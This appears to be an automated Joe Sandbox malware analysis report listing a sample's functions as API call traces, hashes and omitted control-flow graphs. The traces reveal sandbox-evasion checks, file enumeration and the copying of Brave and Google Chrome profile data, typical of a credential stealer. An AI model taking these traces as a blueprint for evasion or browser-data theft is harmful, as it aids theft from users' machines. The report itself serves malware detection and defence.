                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: 017550757e99b7cc9215a71a07dd6763c85996048d17ed6f356ef92ae3dbfa04
                              • Instruction ID: a960c8a4ed4b054ce5ca13fd22d43cf46ef06d2ea974517db73d59c55dda8998
                              • Opcode Fuzzy Hash: 017550757e99b7cc9215a71a07dd6763c85996048d17ed6f356ef92ae3dbfa04
                              • Instruction Fuzzy Hash: 833192B1D04209AFCB14CFB88A859EFBFBCEF59701F10456EE605F7654E2348A448BA1

                              Control-flow Graph
                              • [Graph image rendered as text; omitted. Basic blocks e34bc0-e34c48, marked Executed / Not Executed; path passes through three calls to ??2@YAPAXI@Z, lstrlen, InternetCrackUrlA and a call to e32a20.]
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00E34BF7
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E34C01
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00E34C0B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 00E34C1F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 00E34C27
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: 8ef6e9738ace8b6ba66bd18fe131a0b101507a1544d65a34fd0012dbfc229aa3
                              • Instruction ID: 1cafece511344c7d9d64a036da5412c64f58495ff2da98007b39e7cbcc1c0a2a
                              • Opcode Fuzzy Hash: 8ef6e9738ace8b6ba66bd18fe131a0b101507a1544d65a34fd0012dbfc229aa3
                              • Instruction Fuzzy Hash: 51011B71D00218ABDB14DFA9E849B9EBBA8AB08324F00812AF954E7290DB7459048BD4

                              Control-flow Graph
                              • [Graph image rendered as text; omitted. Basic blocks e31030-e310b6, marked Executed / Not Executed; path passes through GetCurrentProcess, VirtualAllocExNuma, then either ExitProcess or VirtualAlloc and VirtualFree.]
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E31046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E3104D
                              • ExitProcess.KERNEL32 ref: 00E31058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E3106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E310AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: 3fa25c0b14ff567182957af739dc5c242d8e4979edc8f7cf54229136ae75846e
                              • Instruction ID: c1d6fd5f463c1a7e8e3ce8f00d29aaccef12136943ccd0e3c6f6cde0420852d3
                              • Opcode Fuzzy Hash: 3fa25c0b14ff567182957af739dc5c242d8e4979edc8f7cf54229136ae75846e
                              • Instruction Fuzzy Hash: DC01F4717403047FFB244AA5AC1EF6B7BADA784B09F308018F784F72C0D9B6E9008A64

                              Control-flow Graph
                              • [Graph image rendered as text; omitted. Basic blocks e4ee90-e4efa0, marked Executed / Not Executed; path passes through calls to e32930, e36c40 and e32a20 (ten times), lstrcpy and StrCmpCA.]
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EEC3
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00E4EEDE
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E4EF3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: e2cf55eae2fb167cc5617724be107cdd9acf2e0cf2d154897b83c86b331ebdc9
                              • Instruction ID: 276dfb16d16fa618ad88aba09fd0f953f4aec3c3d4d9afead865e8be33a7558b
                              • Opcode Fuzzy Hash: e2cf55eae2fb167cc5617724be107cdd9acf2e0cf2d154897b83c86b331ebdc9
                              • Instruction Fuzzy Hash: 8121DD706203459FCB21BF79E84AA9A7BE4AF10304F04656CB98AEB252DA35ED14D790

                              Control-flow Graph
                              • [Graph image rendered as text; omitted. Basic blocks e310c0-e3111d, marked Executed / Not Executed; path passes through GlobalMemoryStatusEx with a branch to ExitProcess.]
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 0527fe468e43cf78decdbdee2cde432e9d70412f05d8456ce1fdb8239904f6ea
                              • Instruction ID: f5e68fc3752ad9d238ff05dcba9cbc038aa2478ae0f049863eb9ee22fb71acf8
                              • Opcode Fuzzy Hash: 0527fe468e43cf78decdbdee2cde432e9d70412f05d8456ce1fdb8239904f6ea
                              • Instruction Fuzzy Hash: C2F05C701082448FEB146964D94E36DFFD8EB04354F2029BDEEDBD2190E230CC40C627

                              Control-flow Graph
                              • [Graph image rendered as text; omitted. Basic blocks e48c88-e48eef, marked Executed / Not Executed; path passes through repeated StrCmpCA and lstrlen comparisons, calls to e32a20 and e32930, lstrcpy, with a branch to ExitProcess.]
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: 152db991df7240b0900529fc0576ee3aade21ed9df4ed1e407d98f4972a2ec6e
                              • Instruction ID: 7357aa68838e2ba13cd4bda1d4d56574a17c4048e5edb1fec6df4bae5a1ade17
                              • Opcode Fuzzy Hash: 152db991df7240b0900529fc0576ee3aade21ed9df4ed1e407d98f4972a2ec6e
                              • Instruction Fuzzy Hash: EAE0D86441C345AFDB3096B59C9ACC77B5C8F54200F400165FE404B650F534DD14C3EB
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E31046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E3104D
                              • ExitProcess.KERNEL32 ref: 00E31058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E3106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E310AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: 0d86038acaf54198b8b5e7ac9dc5a2cb9d13c460bf334e8a47ec0a693dce7752
                              • Instruction ID: 0cf10ca33a4f48d2abcd337e6a32a52930235856ca9ef5f649a8fed8de62d628
                              • Opcode Fuzzy Hash: 0d86038acaf54198b8b5e7ac9dc5a2cb9d13c460bf334e8a47ec0a693dce7752
                              • Instruction Fuzzy Hash: A9E086B078C3407FFA3512615C5DF123F2C9B52B04F004055F681EA4D1D5A9A400C675
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E423D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E423F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E42402
                              • lstrlen.KERNEL32(\*.*), ref: 00E4240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E42436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E42486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 27ce93c0a4f021994999950dacd2a495618246372a11dcde95c12f73b473f8f2
                              • Instruction ID: db2def31ad77e5d74238807ed6022c6ba4997883f887f81d8c70c2c98ba9cc8a
                              • Opcode Fuzzy Hash: 27ce93c0a4f021994999950dacd2a495618246372a11dcde95c12f73b473f8f2
                              • Instruction Fuzzy Hash: 8AA28E30A013169FDB21AF74E888AAE7BF9AF44308F44652DFA85B7255DB39DD01CB50
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E316E2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3176C
                              • lstrcat.KERNEL32(00000000), ref: 00E31776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E317A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E317EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E317F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31825
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31875
                              • lstrcat.KERNEL32(00000000), ref: 00E3187F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E318AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E318F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E318FE
                              • lstrlen.KERNEL32(00E61794), ref: 00E31909
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31929
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31935
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3195B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31966
                              • lstrlen.KERNEL32(\*.*), ref: 00E31971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3198E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E3199A
                                • Part of subcall function 00E54040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00E5406D
                                • Part of subcall function 00E54040: lstrcpy.KERNEL32(00000000,?), ref: 00E540A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E319C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31A0E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31A16
                              • lstrlen.KERNEL32(00E61794), ref: 00E31A21
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31A41
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31A4D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31A76
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31A81
                              • lstrlen.KERNEL32(00E61794), ref: 00E31A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31AAC
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31AB8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31ADE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31AE9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31B11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E31B45
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E31B70
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E31B8A
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31BC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31BFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31C03
                              • lstrlen.KERNEL32(00E61794), ref: 00E31C0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31C31
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31C3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31C69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31C74
                              • lstrlen.KERNEL32(00E61794), ref: 00E31C7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31CA2
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31CAE
                              • lstrlen.KERNEL32(?), ref: 00E31CBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31CDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31CE9
                              • lstrlen.KERNEL32(00E61794), ref: 00E31CF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31D14
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31D20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31D46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31D51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31D7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31DE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31DEB
                              • lstrlen.KERNEL32(00E61794), ref: 00E31DF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31E19
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31E25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31E4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E31E56
                              • lstrlen.KERNEL32(00E61794), ref: 00E31E61
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31E81
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E31E8D
                              • lstrlen.KERNEL32(?), ref: 00E31E9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31EBA
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31EC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31EF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E31F3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E31F45
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E31F9F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E31FAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31FDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00E31FE3
                              • lstrlen.KERNEL32(00E61794), ref: 00E31FEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3200E
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3201A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E32042
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3204D
                              • lstrlen.KERNEL32(00E61794), ref: 00E32058
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E32075
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E32081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 902b4e8d9a922756b22c4477e39eb3b5fcbc30599b5305d26f18fc6548220606
                              • Instruction ID: 33a1c1e8a88688d9147024d1ba3e5e6cb9340f7836b40fd2a20d5a9d8c7f67e6
                              • Opcode Fuzzy Hash: 902b4e8d9a922756b22c4477e39eb3b5fcbc30599b5305d26f18fc6548220606
                              • Instruction Fuzzy Hash: ED927E319013169FCB21AFA4D98CAAE7BF9AF40308F14616CFA85B7215DB35DD05CBA0
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DBC1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DBE4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DBEF
                              • lstrlen.KERNEL32(00E64CA8), ref: 00E3DBFA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC17
                              • lstrcat.KERNEL32(00000000,00E64CA8), ref: 00E3DC23
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DC4C
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DC8F
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DCBF
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E3DCD0
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E3DCF0
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E3DD0A
                              • lstrlen.KERNEL32(00E5CFEC), ref: 00E3DD1D
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3DD47
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DD70
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DD7B
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DD86
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDA3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DDAF
                              • lstrlen.KERNEL32(?), ref: 00E3DDBC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DDDF
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3DDED
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DE19
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DE3D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DE6F
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DE7B
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DE8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DEB0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DEBB
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DEC6
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3DEE6
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DEF2
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3DF01
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF27
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DF32
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DF5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFA5
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3DFB1
                              • lstrlen.KERNEL32(00D28AD8), ref: 00E3DFC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3DFE9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3DFF4
                              • lstrlen.KERNEL32(00E61794), ref: 00E3DFFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E022
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E3E02E
                              • lstrlen.KERNEL32(00D28BD8), ref: 00E3E03D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E063
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3E06E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E09A
                              • StrCmpCA.SHLWAPI(?,Brave), ref: 00E3E0CD
                              • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E3E0E7
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E11F
                              • lstrlen.KERNEL32(00D2DF58), ref: 00E3E12E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E155
                              • lstrcat.KERNEL32(00000000,?), ref: 00E3E15D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E19F
                              • lstrcat.KERNEL32(00000000), ref: 00E3E1A9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E1D0
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E3E1F9
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E22F
                              • lstrlen.KERNEL32(00D28C08), ref: 00E3E23D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E261
                              • lstrcat.KERNEL32(00000000,00D28C08), ref: 00E3E269
                              • lstrlen.KERNEL32(\Brave\Preferences), ref: 00E3E274
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E29B
                              • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00E3E2A7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E2CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E30F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E349
                              • DeleteFileA.KERNEL32(?), ref: 00E3E381
                              • StrCmpCA.SHLWAPI(?,00D2E078), ref: 00E3E3AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E3F4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E41C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E445
                              • StrCmpCA.SHLWAPI(?,00D28BD8), ref: 00E3E468
                              • StrCmpCA.SHLWAPI(?,00D28AD8), ref: 00E3E47D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E4D9
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E3E4E0
                              • StrCmpCA.SHLWAPI(?,00D2E090), ref: 00E3E58E
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3E5C4
                              • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E3E639
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E678
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E6A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E6C7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E70E
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E737
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E75C
                              • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00E3E776
                              • DeleteFileA.KERNEL32(?), ref: 00E3E7D2
                              • StrCmpCA.SHLWAPI(?,00D28C78), ref: 00E3E7FC
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E88C
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E8B5
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E8EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3E916
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3E952
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 2635522530-726946144
                              • Opcode ID: 2cecdb1cb24f88265505401789b08bf015b35d68641fd011d89a75e4b5110125
                              • Instruction ID: f07576b0854c199164eb1ca6aae88e11b99c93121e43ee1102e42a011c8fa148
                              • Opcode Fuzzy Hash: 2cecdb1cb24f88265505401789b08bf015b35d68641fd011d89a75e4b5110125
                              • Instruction Fuzzy Hash: 3F927C71A103059FCB20EF68D88DAAE7BF9AF44308F146528F985B7255DB35EC45CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E418D2
                              • lstrlen.KERNEL32(\*.*), ref: 00E418DD
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E418FF
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 00E4190B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41932
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00E41947
                              • StrCmpCA.SHLWAPI(?,00E617A0), ref: 00E41967
                              • StrCmpCA.SHLWAPI(?,00E617A4), ref: 00E41981
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E419BF
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E419F2
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E41A1A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41A25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A4C
                              • lstrlen.KERNEL32(00E61794), ref: 00E41A5E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A80
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41A8C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41AB4
                              • lstrlen.KERNEL32(?), ref: 00E41AC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41AE5
                              • lstrcat.KERNEL32(00000000,?), ref: 00E41AF3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B19
                              • lstrlen.KERNEL32(00D28BB8), ref: 00E41B2F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B59
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41B64
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B8F
                              • lstrlen.KERNEL32(00E61794), ref: 00E41BA1
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41BC3
                              • lstrcat.KERNEL32(00000000,00E61794), ref: 00E41BCF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41BF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C25
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E41C30
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C57
                              • lstrlen.KERNEL32(00E61794), ref: 00E41C69
